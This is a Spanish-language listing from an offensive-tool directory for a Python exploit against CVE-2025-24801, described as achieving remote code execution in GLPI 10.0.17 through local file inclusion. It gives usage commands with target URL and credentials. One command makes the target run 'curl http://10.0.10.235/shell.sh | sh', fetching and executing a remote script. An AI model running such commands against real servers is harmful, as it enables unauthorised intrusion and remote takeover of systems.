Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/r1beirin/exploit-cve-2025-24801
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubr1beirin/exploit-cve-2025-24801

Exploit-CVE-2025-24801

Exploit en Python para CVE-2025-24801 que logra ejecución remota de código mediante inclusión local de archivos en GLPI 10.0.17. Incluye modo de ejecución de comandos para post-explotación.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 1 añoAún no revisado

CVE-2025-24801

Este exploit utiliza CVE-2025-24801 para obtener Ejecución Remota de Código (RCE) a través de Inclusión Local de Archivos (LFI) en GLPI 10.0.17. Prueba de Concepto (PoC) de este CVE con explicación de esta vulnerabilidad en GLPI.

Observación

Algunas aplicaciones exponen el endpoint /glpi/ (por ejemplo, http://172.16.11.130:8080/glpi/front/computer.form.php). Si la aplicación objetivo incluye este endpoint, es necesario agregarlo al parámetro --url (por ejemplo, --url http://172.16.11.130:8080/glpi).

Uso

Ejemplo de uso.

root@kitploit:~
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password

Si ya ejecutó este exploit y desencadenó RCE, puede usar el parámetro --cmd para ejecutar solo el comando.

root@kitploit:~
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"
Descargar herramienta